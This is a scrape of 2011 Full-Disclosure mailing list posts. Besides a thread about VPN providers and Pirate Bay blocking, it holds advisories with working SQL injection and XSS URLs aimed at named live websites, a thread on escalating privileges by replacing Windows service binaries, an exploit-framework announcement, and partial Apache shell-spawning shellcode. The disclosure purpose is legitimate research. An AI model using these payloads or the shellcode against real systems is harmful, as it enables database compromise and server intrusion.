tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning
Re: [Full-disclosure] VPN providers and any providers in general...
On the piratebay.org dilemma for isps, i found this posted just *now* (10pm,australian time) Belgian ISPs Ordered To Block The Pirate Bay - http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/ Interesting developments regarding this.. I am using the RSS feed on TF to keepup qwith this case seems it has taken a sharp u-turn! headsup! xd On 4 October 2011 18:06, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
well here in denmark they are also blocked but as most other places it's a block on DNS level so it's very easy to get around 2011/10/4 xD 0x41 sec...@gmail.com On the piratebay.org dilemma for isps, i found this posted just *now* (10pm,australian time) Belgian ISPs Ordered To Block The Pirate Bay - http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/ Interesting developments regarding this.. I am using the RSS feed on TF to keepup qwith this case seems it has taken a sharp u-turn! headsup! xd On 4 October 2011 18:06, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On 10/4/2011 7:36 AM, doc mombasa wrote: well here in denmark they are also blocked but as most other places it's a block on DNS level so it's very easy to get around 2011/10/4 xD 0x41 sec...@gmail.com mailto:sec...@gmail.com On the piratebay.org http://piratebay.org dilemma for isps, i found this posted just *now* (10pm,australian time) Belgian ISPs Ordered To Block The Pirate Bay - http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/ http://feed.torrentfreak.com/%7Er/Torrentfreak/%7E3/FMfrUHk1sZM/ Interesting developments regarding this.. I am using the RSS feed on TF to keepup qwith this case seems it has taken a sharp u-turn! headsup! xd On 4 October 2011 18:06, Ferenc Kovacs tyr...@gmail.com mailto:tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com mailto:sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com mailto:tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org mailto:laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ It also just tends to increase TPB's traffic in the long run. ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] VPN providers and any providers in general...
there is no such thing as bad publicity (especially for sites like TPB) 2011/10/4 Laurelai laure...@oneechan.org On 10/4/2011 7:36 AM, doc mombasa wrote: well here in denmark they are also blocked but as most other places it's a block on DNS level so it's very easy to get around 2011/10/4 xD 0x41 sec...@gmail.com On the piratebay.org dilemma for isps, i found this posted just *now* (10pm,australian time) Belgian ISPs Ordered To Block The Pirate Bay - http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/ Interesting developments regarding this.. I am using the RSS feed on TF to keepup qwith this case seems it has taken a sharp u-turn! headsup! xd On 4 October 2011 18:06, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ It also just tends to increase TPB's traffic in the long run. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
I believe they are supporting it. On Oct 4, 2011 9:29 AM, Georgi Guninski gunin...@guninski.com wrote: On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote: What tears? I don't even use those providers. What a nice drivel in this thread :))) btw, are Anonymous affiliated/supporting the usa protests aka OccupyWallStreet? all the usa needs is a revolution just before they go bankrupt :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Canadian ISP Website - SQL Injection Vulnerability
Title: == Canadian ISP Website - SQL Injection Vulnerability Date: = 2011-09-23 VL-ID: = 282 Reference: == http://www.vulnerability-lab.com/get_content.php?id=282 Introduction: = Canadianisp.ca - Is a wholly owned project of Marc Bissonnette / InternAlysis. It was originally created as a joint venture with Bob Carrick of Carrick Solutions, with sole ownership transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca is the only website that allows you to search for an Internet service provider (Dial-up, ISDN, DSL, Cable, Satellite, Point to Point, Wireless and Voice Over IP (VoIP)) anywhere in Canada. Customers can post reviews, and ISPs submit their own services. All for free. CanadianISP is also one of the most accurate and most up-to-date ISP lists on the net. There are many ISP lists out there, but the vast majority of them (as far as we have seen and we last searched and looked in April of 2011) are out of date, listing companies no longer in business, no longer providing connectivity or simply pages of ads with no relevance to the users search parameters. ISPs can submit and edit / update their own services at all times, free of charge. (Copy of the Vendor Homepage: www.canadianisp.ca/about.htm) Abstract: = Vulnerability-Lab Team discovered a critical remote SQL Injection vulnerability on the Canadian ISP main vendor website. Report-Timeline: 2011-09-24: Vendor Notification 2011-10-03: Vendor Response/Feedback 2011-10-04: Vendor Fix/Patch 2011-10-04: Public or Non-Public Disclosure Status: Published Affected Products: == Canadian ISP Website - 2011/Q2-3 Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected on canadians isp website. The bug allows remote attackers to inject/execute own sql statements/commands over a vulnerable applicataion parameter on the main web service. Successful exploitation of the remote sql injection vulnerability can result in database managemtn system compromise website manipulations. Vulnerable Module(s): [+] ispsearch.cgi Vulnerable Param(s): [+] ispid Pictures: ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... html headbody titleRemote SQL Injection PoC - CANADIAN ISP/title iframe src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetailispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100, 101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134, 135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168, 169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202, 203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236, 237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270, 271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304, 305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338, 339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372, 373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406, 407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440, 441,442,443,444,445,446,447-- brbr /body/head /html Risk: = The security risk of the remote sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential
[Full-disclosure] Prosieben Website - Multiple SQL Injection Vulnerabilities
Title:
==
Prosieben Web Services - Multiple SQL Injection Vulnerabilities
Date:
=
2011-09-26
VL-ID:
=
284
Abstract:
=
The Vulnerability Lab Research Team discovered multiple remote SQL
Injection vulnerabilities on prosiebens - tvtotal vendor website.
Report-Timeline:
2011-09-01:Vendor Fix/Patch
2011-10-04:Public or Non-Public Disclosure [FULL RELEASE]
Status:
Unpublished
Exploitation-Technique:
===
Remote
Severity:
=
Critical
Details:
Multiple remote SQL Injection vulnerabilities are detected on Prosiebens
Tvtotal vendor website.
Remote attackers can inject/execute own sql statements over the
vulnerable modules on the affected dbms.
Successful exploitation can result in server database management
system compromise.
Vulnerable Module(s):
[+] Player - Index
[+] Videos Listing
[+] Community Profiles
Vulnerable Param(s):
[+] ?list=tagtag=stefan_raabtagId=
[+] ?contentId=
[+] ?u=
Pictures:
../1.png
../2.png
../
Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers. For
demonstration or reproduce ...
1.1
URL:http://tvtotal.prosieben.de
PATH:/tvtotal/videos/player/
File:index.html
Para:?contentId=
http://tvtotal.prosieben.de/tvtotal/videos/player/index.html?contentId=-42136+union+select+1,2,3,4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31,32,33,34,35,36--+
1.2
http://tvtotal.prosieben.de/tvtotal/suche/?query=;IFRAME
SRC=javascript:alert('X4lt');/IFRAMEx=13y=18
2.1
URL:http://tvtotal.prosieben.de
PATH:/tvtotal/videos/
File:index.html
Para:?list=tagtag=stefan_raabtagId='
http://tvtotal.prosieben.de/tvtotal/videos/index.html?list=tagtag=stefan_raabtagId=18
and 1=2--
3.1
URL:http://tvtotal.prosieben.de
PATH:/tvtotal/community/forum/
File:account.php
Para:?u=-1'
http://tvtotal.prosieben.de/tvtotal/community/forum/account.php?u=-1
order by 1--
Risk:
=
The security risk of the sql injection vulnerabilities are estimated as
critical.
Credits:
Vulnerability Research Laboratory
Disclaimer:
===
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially
usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its
unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2011|Vulnerability-Lab
Comment: Thanks for the free tickets to tvtotal ;) by f0x
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote: What tears? I don't even use those providers. What a nice drivel in this thread :))) btw, are Anonymous affiliated/supporting the usa protests aka OccupyWallStreet? all the usa needs is a revolution just before they go bankrupt :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
Unfortunately, on W7 and any other box with proper restrictions, you need to run that command as admin to get the full result set. If you are an unprivileged user looking for a process to escalate to: tasklist /v /fi USERNAME ne %USERNAME% or tasklist /v| find Unknown N/A Will give you a good place to start looking. On Tue, Sep 27, 2011 at 1:25 AM, Gary Slavin ga...@sec-1.com wrote: the trick is to find one that is writable while logged in as a less priveleged user and then overwrite the executable. Anti virus executables are typically a good place to start :) tasklist /fi USERNAME eq NT AUTHORITY\SYSTEM” Image Name PID Session Name Session#Mem Usage = == System Idle Process0 Console 0 28 K System 4 Console 0236 K smss.exe 704 Console 0388 K csrss.exe752 Console 0 4,032 K winlogon.exe 776 Console 0 2,904 K services.exe 820 Console 0 4,612 K lsass.exe832 Console 0 1,724 K ati2evxx.exe 980 Console 0 2,676 K svchost.exe 1020 Console 0 5,948 K svchost.exe 1200 Console 0 23,100 K DLService.exe 1484 Console 0 7,856 K spoolsv.exe 1848 Console 0 6,992 K schedul2.exe2028 Console 0 2,036 K inetinfo.exe 228 Console 0 10,484 K mnmsrvc.exe 364 Console 0 3,436 K rundll32.exe 352 Console 0 3,168 K *SAVAdminService.exe 356 Console 0 2,548 K** *ManagementAgentNT.exe580 Console 0 4,624 K ALsvc.exe748 Console 0944 K RouterNT.exe1004 Console 0 4,884 K vsAOD.Exe 1868 Console 0 4,224 K C:\Documents and Settings\pentest From: Steve Syfuhs [st...@syfuhs.net] Sent: 26 September 2011 19:09 To: Madhur Ahuja; security-bas...@securityfocus.com; full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Privilege escalation on Windows using Binary Planting Well yeah, if the system that's designed to protect you isn't functioning, then you aren't protected and all sorts of bad things can happen. When services starts up, the root service executable looks through a registry key to find all the services that should be run. It then executes the value in the key relative to each service based on which account is specified. There is no signature checking or anything funky like that going on. If the path stored in the registry entry is a valid executable, it will get executed. It is up to the installer to make sure that the service cannot be replaced. This is done by storing it in Program Files, or one of the other recommended locations, which only administrators can access by default. If the executable is stored in another location, it is still up to the installer to set up proper file permissions. Further, only an administrator should be able to start or stop the service. All of this is up to the installer, and the service itself to handle. If a service or installer deviates from the prescribed design set out by Microsoft, is it really Windows' fault that it happened? Not really. So, yes you could escalate privilege through this method, but really the failure is by the developer of the service, or by the developer of the installer. -Original Message- From: listbou...@securityfocus.com [mailto:listbou...@securityfocus.com] On Behalf Of Madhur Ahuja Sent: Sunday, September 25, 2011 2:31 PM To: security-bas...@securityfocus.com; full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using Binary Planting Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur
[Full-disclosure] New open source Security Framework
Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules. This open source project comes to fill a need, a high quality framework for exploits and security researchers with a GPL license and Python as engine for its modules. GPL license to ensure the code will always be free Instant search built-in for modules easy access Module editor that allows the user to create custom exploits Modules use XML DOM, really easy to modify Python as Engine because its the language more used on security related programming We are actually working with social code network, to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com Why don’t you download and give it a try right now? While downloading, you may watch this quick video on YouTube! Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website: http://www.exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
So this is from the same people that developed Insect Pro? Chris On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules. This open source project comes to fill a need, a high quality framework for exploits and security researchers with a GPL license and Python as engine for its modules. GPL license to ensure the code will always be free Instant search built-in for modules easy access Module editor that allows the user to create custom exploits Modules use XML DOM, really easy to modify Python as Engine because its the language more used on security related programming We are actually working with social code network, to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com Why don’t you download and give it a try right now? While downloading, you may watch this quick video on YouTube! Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website: http://www.exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 insecurityresearch.com (the Insect PRO site) does in fact seem to redirect to exploitpack.com - nice catch Chris. Justin Klein Keane http://www.MadIrish.net The digital signature on this e-mail may be confirmed using the PGP key located at: http://www.madirish.net/gpgkey On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote: So this is from the same people that developed Insect Pro? Chris On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules. This open source project comes to fill a need, a high quality framework for exploits and security researchers with a GPL license and Python as engine for its modules. GPL license to ensure the code will always be free Instant search built-in for modules easy access Module editor that allows the user to create custom exploits Modules use XML DOM, really easy to modify Python as Engine because its the language more used on security related programming We are actually working with social code network, to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com Why don’t you download and give it a try right now? While downloading, you may watch this quick video on YouTube! Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website: http://www.exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iPwEAQECAAYFAk6LXyQACgkQkSlsbLsN1gDTAwb/U8PFg04A1Te4LywChw0tMQeG IZZf1wc3Uo0SVYoTxRjRgCfYKyLNaAgt2jvpxoaj2RlJssU/Conj7mBNXc1if3yj Jx+i2uKWUs0PMxU3reze5/xLrAL1avXAlpSeM9/9WO1hHeW/s7NTQUnMIRtnDwhT TII1euY67LuyQUqsK7LhShVZEK2uCu3pmIS3SIxTJKATXmo1UtU2VYxvnfLSVD8+ KwxL166Q20Xhyd4+i+u5buOGARm3vOO5d3wiN8hEuNXSJXM4v6dswUaR1y4Zx9U6 3PrlNE7PDDdjWHj2mcA= =zyNs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Just for those, who want to build their own apache shell code for
testing purposes, this snip might be of some use. It uses the still
open tcp connections to the server to spawn the shells, so that no
backconnect is needed. Of course, it does not give remote root but
only httpd user privs. And you should send exec 10 as first
command if you want to see remote shell stdout.
Are there any ideas how to make the code more robust (currently
raciness due to frequent syscalls is problematid), smaller or add
features (I thought using the libc GOT, but this made code larger and
I do not know if that would make code much more portable)?
PS: There is no use to compile or run it, it is just embedded into .c
file for compilation (too lazy to look up gcc args for .S assem)
before insertion into vectors.
- --
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFOi3nbxFmThv7tq+4RAv8cAJ4tR3T2Ssx8SOYr5eDqX5OYqNyhmgCfbjd1
f9X896pIjKEn/l/3ZLv1Ha8=
=5K0l
-END PGP SIGNATURE-
/** This software is provided by the copyright owner as is to
* study it but without any expressed or implied warranties, that
* this software is fit for any other purpose. If you try to compile
* or run it, you do it solely on your own risk and the copyright
* owner shall not be liable for any direct or indirect damage
* caused by this software.
*
* Copyright (c) 2011 halfdog me (%) halfdog.net
*
* Compile, cut shellcode from hex between 4141 and 9090
*
* gcc -g -o ForkPayload ForkPayload.c
*/
#include stdio.h
#include sys/mman.h
int main(int argc, char **argv) {
int *address;
int maddr,result;
address=mmap((void*)(0x4000), 120,
PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
fprintf(stderr, Memory at 0x%x\n, (int)address);
mprotect((void*)((int)(address)+(116)),
(112), PROT_EXEC|PROT_READ|PROT_WRITE);
maddr=*((int*)(((int)mprotect)+2)); // offset entry
maddr=*((int*)(maddr))+1; // maddr offset
fprintf(stderr, mprotect 0x%x\n, maddr);
asm volatile (
// Start marker
pushl 0x41414141;
// Stack still contains old return address in mprotect. Store it in
// ebx, since ebx is not modified during following syscalls
movl -0xc(%%esp),%%ebx;
// Spread the stack layout otherwise mpm-worker syscall will crash
// due to using same stack memory in multiple threads. This is
// still racy, but risk for context switch between addl and pop
// is very slim
lea -0x38(%%esp),%%esp;
addl $0x40,(%%esp);
popl %%esp;
xorl %%esi,%%esi; // stdin of shell
xorl %%edi,%%edi;
// First fd to dup, usually mpm tcp socket are in range 0x10 - 0x20,
// depending on how many logfiles running or modules have open fds.
